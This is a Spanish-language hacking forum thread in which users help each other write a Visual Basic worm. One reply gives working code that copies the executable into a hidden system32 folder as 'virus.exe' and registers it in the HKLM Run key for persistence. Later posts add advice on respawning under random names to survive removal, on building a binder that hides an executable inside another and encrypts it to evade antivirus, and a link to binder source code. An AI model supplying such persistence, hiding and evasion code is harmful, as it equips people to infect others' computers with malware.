Señores, quien sabe como seria un ejemplo de gusano con VB. Un code que inocule nuestro .exe en otros archivos, de manera que al abrirlos posteriormente tambien vuelva a ejecutarlo.
Como harian una infeccion?? ::)
Te voy a poner aqui un código básico para infectar un equipo con tu gusano:
Set sh = CreateObject("WScript.Shell")
Set ficheros = CreateObject("Scripting.FileSystemObject")
ficheros.CreateFolder "C:\Windows\system32\privatesystem"
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Windows\system32\privatesystem" & "\" & "virus" & ".exe"
Call SetAttr("C:\Windows\system32\privatesystem" & "\virus.EXE", vbHidden)
sh.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\private", "C:\Windows\system32\privatesystem\virus.exe"
Con esto se copia el fichero a una carpeta de system32 creada tu antes, se oculta el programa para que el usuario no lo pueda borrar o le sea mas dificil y luego se registra como aplicación de arranque en HKEY_LOCAL_MACHINE.
Hola...Tambien podrias realizar que en cazo de que cierren tu programa al ser detectado, cree una copia de si mismo con un nombre aleatorio, ademas se grave en una carpeta aleatoria, tambien que esa direccion y nombre de la copia se grave en el clave run, para que se ejecute tu copia, ya que si detectan tu .exe original lo pueden eliminar.......y asi tu gusano no muere........en este momento me encuentro un poco ocupado pero en cuento me desecupe te mando unos codes de ejemplo, bueno si es que los necesitas......espero te sirva esta idea
oues pudiste haber posteado en la sección de troyanos y virus, supongo que lo que pretendes hacer es infeccion de exes con visual basic..en www.gedzac.tk hay un manual que lo explica..
Yo ice uno...lomejor es vbscript...
te refieres a que vbs es mejor para infectar?..si es asi, toy de acuerdo contigo., este lenguaje tiene la propiedad de infectar muchos archivos en variados formatos,, talveez es porque es un lenguaje script..lo cierto es que se pueden hacer bastante cosas como esas en este lenguaje... :P
Una cosa es un gusano que se reproduce y otra cosa un virus que infecta archivos.
Si lo que querés es un worm puse un ejemplo hace un tiempo:
Ejemplo de Worm (gusano) en VB (http://foro.elhacker.net/index.php/topic,54121.0.html)
Si la idea era infectar archivos ya es algo mucho más avanzado que requiere conocimientos de asm, la estructura de los archivos ejecutables, métodos de infección, entre otros.
Si conoces a fondo la estructura de los ejecutables entonces sólo es realizar pruebas. Para más información acerca de su formato mira el siguiente post:
http://foro.elhacker.net/index.php/topic,73694.msg338298.html#msg338298
Y VBS es lo peor para realizar worms, por empezar lo detectan los AVs y segundo que es lentisimo, pero eso no significa que no sirva.
Saludos.
pues figate que en su tiempo este lenguaje tan empequeñesido como lo dejas tu,, fue el que se utilizó para programar I love you.. y me imagino que conoceras las consecuencias que trajo ..
hoy por hoy, es cierto es un lenguaje que ya no se usa para programar worm .debido a que todos querian hacer su gusano en el ,y por lo mismo ya lo detectan lo AVs...
Pero, de que permite hacer muchas cosas, lo permite y de manera bastante facil..en comparacion con lenguajes de proposito general ..
I love you fue una verdadera maravilla pero en ese entonces los AVs no lo detectaban y por eso fue tan poderoso, hoy en día no se puede hacer nada en VBS que no detecten los AVs
Saludos.
Muy bien!! Gracias a todos!!
Dunklerstern - Excelente la reproduccion del gusano.
[P$3ud0r00†] - No puedo ver el manual que dices, como le encuentras en ese sitio?
Del 'I Love You' no estoy seguro si en lo que se ha publicado como su fuente este virus hace una verdadera infectacion a los archivos de la pc.
Pienso que - a lo mejor sirve para infectar, hacer un juntador o binder que metiera el clon del ejecutable a todo el vecindario de archivos.
Por lo tanto, alguien tiene un code de juntador en VB que le funcione??
No es tan dificil hacer un binder. Primero utilizas GetBinaryType (http://msdn.microsoft.com/library/default.asp?url=/library/en-us/fileio/fs/getbinarytype.asp) para verificar que sea un archivo PE. Luego extraes el icono prederminado usando la función ExtractIcon (http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/winui/windowsuserinterface/resources/icons/iconreference/iconfunctions/extracticon.asp) y lo guardas.
Una vez hecho esto agregas el archivo que querés ocultar al final de tu ejecutable y guardas la posición de inicio en alguna parte de tu programa, podrías crear una sección nueva pero a menudo los AVs lo detectan :-\.
Para terminar le cambias el icono al programa usando las funciones BeginUpdateResource (http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/winui/windowsuserinterface/resources/introductiontoresources/resourcereference/resourcefunctions/beginupdateresource.asp) y UpdateResource (http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/winui/windowsuserinterface/resources/introductiontoresources/resourcereference/resourcefunctions/updateresource.asp).
También podrías cifrar el ejecutable que ocultas para que sea menos alevoso. Luego pongo un ejemplo de esto último.
Cabe destacar que es mucho más divertido hacer todo lo anterior pero leyendo directamente el ejecutable :P, sin usar las funciones de Windows. Por eso es muy necesario conocer la estructura que nombraba en un post anterior.
Saludos.
no sé si sabras algo de C como para entender el siguiente código, pero de todas formas en la cabecera está explicado el funcionamiento.
http://lympex.sosvulnerable.net/resources/sources/Jhoiner_v0.7_source.zip
ENTONCES ES MAS RECOMENDABLE PROGRAMAR WORMS EN C?
O EN que LENGUAJE LO RECOMIENDAN?